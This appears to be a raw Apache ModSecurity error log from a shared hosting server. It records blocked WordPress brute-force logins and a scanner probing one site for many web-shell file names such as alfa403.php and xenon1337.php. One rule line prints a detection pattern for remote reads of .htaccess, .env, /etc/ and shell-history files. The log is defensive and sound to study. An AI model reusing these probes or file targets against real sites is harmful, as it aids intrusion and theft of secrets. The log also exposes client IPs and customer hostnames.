[Tue May 26 19:14:39.475330 2026] [security2:error] [pid 18465:tid 18669] [client 123.20.34.193:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjx06GHndkguR9cLKjgwAAAEk"]
[Tue May 26 19:14:39.600707 2026] [security2:error] [pid 18465:tid 18719] [client 139.180.228.167:46751] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWjxk6GHndkguR9cLKjdgAAAHs"], referer: https://anujtradingco.com
[Tue May 26 19:14:40.962352 2026] [security2:error] [pid 18465:tid 18525] [remote 222.165.190.235:43154] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjyE6GHndkguR9cLKj4wAAFjs"]
[Tue May 26 19:14:41.057100 2026] [security2:error] [pid 18465:tid 18704] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjyE6GHndkguR9cLKj3wAAAGw"]
[Tue May 26 19:14:41.416816 2026] [security2:error] [pid 18465:tid 18555] [remote 222.165.190.235:43154] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjyU6GHndkguR9cLKkDAAABVk"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:14:42.462254 2026] [security2:error] [pid 18465:tid 18568] [remote 103.95.119.103:46342] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjyk6GHndkguR9cLKkQAAAMWY"]
[Tue May 26 19:14:42.514735 2026] [security2:error] [pid 18465:tid 18469] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWjyk6GHndkguR9cLKkTwAAZgM"]
[Tue May 26 19:14:42.514886 2026] [security2:error] [pid 18465:tid 18698] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWjyk6GHndkguR9cLKkTwAAZgM"]
[Tue May 26 19:14:42.810555 2026] [security2:error] [pid 18465:tid 18579] [remote 103.95.119.103:46342] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjyk6GHndkguR9cLKkWwAAMnE"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:14:42.940272 2026] [security2:error] [pid 18465:tid 18640] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjyk6GHndkguR9cLKkUQAAACw"]
[Tue May 26 19:14:42.961542 2026] [security2:error] [pid 18465:tid 18478] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/x.php"] [unique_id "ahWjyk6GHndkguR9cLKkZgAAFww"]
[Tue May 26 19:14:42.961724 2026] [security2:error] [pid 18465:tid 18619] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/x.php"] [unique_id "ahWjyk6GHndkguR9cLKkZgAAFww"]
[Tue May 26 19:14:43.060585 2026] [security2:error] [pid 18465:tid 18559] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/201.php"] [unique_id "ahWjy06GHndkguR9cLKkcAAAEl0"]
[Tue May 26 19:14:43.060799 2026] [security2:error] [pid 18465:tid 18613] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/201.php"] [unique_id "ahWjy06GHndkguR9cLKkcAAAEl0"]
[Tue May 26 19:14:43.212772 2026] [security2:error] [pid 18465:tid 18572] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/ops.php"] [unique_id "ahWjy06GHndkguR9cLKkdAAAU2o"]
[Tue May 26 19:14:43.212992 2026] [security2:error] [pid 18465:tid 18679] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/ops.php"] [unique_id "ahWjy06GHndkguR9cLKkdAAAU2o"]
[Tue May 26 19:14:43.602692 2026] [security2:error] [pid 18465:tid 18483] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/samll.php"] [unique_id "ahWjy06GHndkguR9cLKkjQAAYRE"]
[Tue May 26 19:14:43.602881 2026] [security2:error] [pid 18465:tid 18693] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/samll.php"] [unique_id "ahWjy06GHndkguR9cLKkjQAAYRE"]
[Tue May 26 19:14:43.767382 2026] [security2:error] [pid 18465:tid 18573] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/ingfo.php"] [unique_id "ahWjy06GHndkguR9cLKklgAABGs"]
[Tue May 26 19:14:43.767600 2026] [security2:error] [pid 18465:tid 18599] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/ingfo.php"] [unique_id "ahWjy06GHndkguR9cLKklgAABGs"]
[Tue May 26 19:14:43.858109 2026] [security2:error] [pid 18465:tid 18574] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/c55cdler.php"] [unique_id "ahWjy06GHndkguR9cLKkngAAQWw"]
[Tue May 26 19:14:43.858313 2026] [security2:error] [pid 18465:tid 18661] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/c55cdler.php"] [unique_id "ahWjy06GHndkguR9cLKkngAAQWw"]
[Tue May 26 19:14:43.934200 2026] [security2:error] [pid 18465:tid 18652] [client 162.158.172.49:9444] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "paqys.com"] [uri "/index.php"] [unique_id "ahWjy06GHndkguR9cLKkeAAAADg"]
[Tue May 26 19:14:43.956352 2026] [security2:error] [pid 18465:tid 18476] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/error_log.php"] [unique_id "ahWjy06GHndkguR9cLKkpQAAFwo"]
[Tue May 26 19:14:43.956487 2026] [security2:error] [pid 18465:tid 18619] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/error_log.php"] [unique_id "ahWjy06GHndkguR9cLKkpQAAFwo"]
[Tue May 26 19:14:44.095005 2026] [security2:error] [pid 18465:tid 18584] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/xenon1337.php"] [unique_id "ahWjzE6GHndkguR9cLKkqQAAC3Y"]
[Tue May 26 19:14:44.095183 2026] [security2:error] [pid 18465:tid 18606] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/xenon1337.php"] [unique_id "ahWjzE6GHndkguR9cLKkqQAAC3Y"]
[Tue May 26 19:14:44.403504 2026] [security2:error] [pid 18465:tid 18575] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/alfa403.php"] [unique_id "ahWjzE6GHndkguR9cLKkwAAACG0"]
[Tue May 26 19:14:44.403760 2026] [security2:error] [pid 18465:tid 18603] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/alfa403.php"] [unique_id "ahWjzE6GHndkguR9cLKkwAAACG0"]
[Tue May 26 19:14:44.589367 2026] [security2:error] [pid 18465:tid 18586] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/test11.php"] [unique_id "ahWjzE6GHndkguR9cLKkxwAAXXg"]
[Tue May 26 19:14:44.589529 2026] [security2:error] [pid 18465:tid 18689] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/test11.php"] [unique_id "ahWjzE6GHndkguR9cLKkxwAAXXg"]
[Tue May 26 19:14:44.713471 2026] [security2:error] [pid 18465:tid 18567] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/koala.php"] [unique_id "ahWjzE6GHndkguR9cLKk0QAAX2U"]
[Tue May 26 19:14:44.713687 2026] [security2:error] [pid 18465:tid 18691] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/koala.php"] [unique_id "ahWjzE6GHndkguR9cLKk0QAAX2U"]
[Tue May 26 19:14:44.820961 2026] [security2:error] [pid 18465:tid 18471] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/mac.php"] [unique_id "ahWjzE6GHndkguR9cLKk1wAAWQU"]
[Tue May 26 19:14:44.821144 2026] [security2:error] [pid 18465:tid 18685] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/mac.php"] [unique_id "ahWjzE6GHndkguR9cLKk1wAAWQU"]
[Tue May 26 19:14:44.913340 2026] [security2:error] [pid 18465:tid 18495] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/25d653587fdfd1.php"] [unique_id "ahWjzE6GHndkguR9cLKk4QAAUB0"]
[Tue May 26 19:14:44.931838 2026] [security2:error] [pid 18465:tid 18676] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/25d653587fdfd1.php"] [unique_id "ahWjzE6GHndkguR9cLKk4QAAUB0"]
[Tue May 26 19:14:45.196090 2026] [security2:error] [pid 18465:tid 18650] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjzE6GHndkguR9cLKk1QAAADY"]
[Tue May 26 19:14:45.199253 2026] [security2:error] [pid 18465:tid 18578] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/wefile.php"] [unique_id "ahWjzU6GHndkguR9cLKk-QAAVXA"]
[Tue May 26 19:14:45.199377 2026] [security2:error] [pid 18465:tid 18681] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/wefile.php"] [unique_id "ahWjzU6GHndkguR9cLKk-QAAVXA"]
[Tue May 26 19:14:45.312071 2026] [security2:error] [pid 18465:tid 18490] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/casp3.php"] [unique_id "ahWjzU6GHndkguR9cLKk_gAAKhg"]
[Tue May 26 19:14:45.312257 2026] [security2:error] [pid 18465:tid 18638] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/casp3.php"] [unique_id "ahWjzU6GHndkguR9cLKk_gAAKhg"]
[Tue May 26 19:14:45.765565 2026] [security2:error] [pid 18465:tid 18583] [remote 172.68.159.42:11871] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.paqys.com"] [uri "/index.php"] [unique_id "ahWjzU6GHndkguR9cLKk-gAASXU"]
[Tue May 26 19:14:45.802524 2026] [http2:info] [pid 26857:tid 26857] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 19:14:45.890865 2026] [autoindex:error] [pid 26857:tid 26858] [remote 74.249.212.138:0] AH01276: Cannot serve directory /home2/kingsr2o/public_html/wp-includes/blocks/post-comments-form/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:14:45.891941 2026] [security2:error] [pid 26857:tid 26989] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.kingsclub.in"] [uri "/cgi-sys/403.html"] [unique_id "ahWjzdfoqtHEG_e9i6GkbgAAhwA"]
[Tue May 26 19:14:46.048043 2026] [autoindex:error] [pid 26857:tid 26862] [remote 74.249.212.138:0] AH01276: Cannot serve directory /home2/kingsr2o/public_html/wp-admin/js/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:14:46.049004 2026] [security2:error] [pid 26857:tid 27019] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.kingsclub.in"] [uri "/cgi-sys/403.html"] [unique_id "ahWjzdfoqtHEG_e9i6GkiAAApQQ"]
[Tue May 26 19:14:46.142751 2026] [security2:error] [pid 26857:tid 26864] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/wp-admin/css/colour.php"] [unique_id "ahWjztfoqtHEG_e9i6GkjwAApgY"]
[Tue May 26 19:14:46.142974 2026] [security2:error] [pid 26857:tid 27020] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/wp-admin/css/colour.php"] [unique_id "ahWjztfoqtHEG_e9i6GkjwAApgY"]
[Tue May 26 19:14:46.273174 2026] [security2:error] [pid 26857:tid 26866] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/half.php"] [unique_id "ahWjztfoqtHEG_e9i6GklQAAuAg"]
[Tue May 26 19:14:46.273384 2026] [security2:error] [pid 26857:tid 27038] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/half.php"] [unique_id "ahWjztfoqtHEG_e9i6GklQAAuAg"]
[Tue May 26 19:14:46.363699 2026] [security2:error] [pid 26857:tid 26868] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/2P.php"] [unique_id "ahWjztfoqtHEG_e9i6GkmQAAwgo"]
[Tue May 26 19:14:46.363910 2026] [security2:error] [pid 26857:tid 27048] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/2P.php"] [unique_id "ahWjztfoqtHEG_e9i6GkmQAAwgo"]
[Tue May 26 19:14:46.500955 2026] [security2:error] [pid 26857:tid 26980] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/tires.php"] [unique_id "ahWjztfoqtHEG_e9i6GkogAAzno"]
[Tue May 26 19:14:46.501178 2026] [security2:error] [pid 26857:tid 27060] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/tires.php"] [unique_id "ahWjztfoqtHEG_e9i6GkogAAzno"]
[Tue May 26 19:14:46.628950 2026] [security2:error] [pid 26857:tid 26979] [remote 88.198.165.116:49174] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.165.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjztfoqtHEG_e9i6GkoAAAt3k"]
[Tue May 26 19:14:46.985239 2026] [security2:error] [pid 26857:tid 27069] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjztfoqtHEG_e9i6GkqAAAANc"]
[Tue May 26 19:14:47.390827 2026] [security2:error] [pid 26857:tid 26876] [remote 103.50.205.131:53076] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.205.50.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWjz9foqtHEG_e9i6GkywABARI"]
[Tue May 26 19:14:47.474327 2026] [security2:error] [pid 26857:tid 27074] [client 74.249.212.138:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.kingsclub.in"] [uri "/index.php"] [unique_id "ahWjztfoqtHEG_e9i6GkrAAA3H8"]
[Tue May 26 19:14:47.474358 2026] [security2:error] [pid 26857:tid 27074] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.kingsclub.in"] [uri "/index.php"] [unique_id "ahWjztfoqtHEG_e9i6GkrAAA3H8"]
[Tue May 26 19:14:49.092523 2026] [security2:error] [pid 26857:tid 27009] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWj0NfoqtHEG_e9i6GlIwAAAJs"]
[Tue May 26 19:14:50.371089 2026] [security2:error] [pid 26857:tid 26915] [remote 216.73.216.30:35441] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at ARGS:filesrc. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWj0tfoqtHEG_e9i6GldAAAlzk"]
[Tue May 26 19:14:50.925104 2026] [security2:error] [pid 26857:tid 26916] [remote 74.249.212.138:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWj0tfoqtHEG_e9i6GleQAA3To"]
[Tue May 26 19:14:50.925132 2026] [security2:error] [pid 26857:tid 26916] [remote 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWj0tfoqtHEG_e9i6GleQAA3To"]
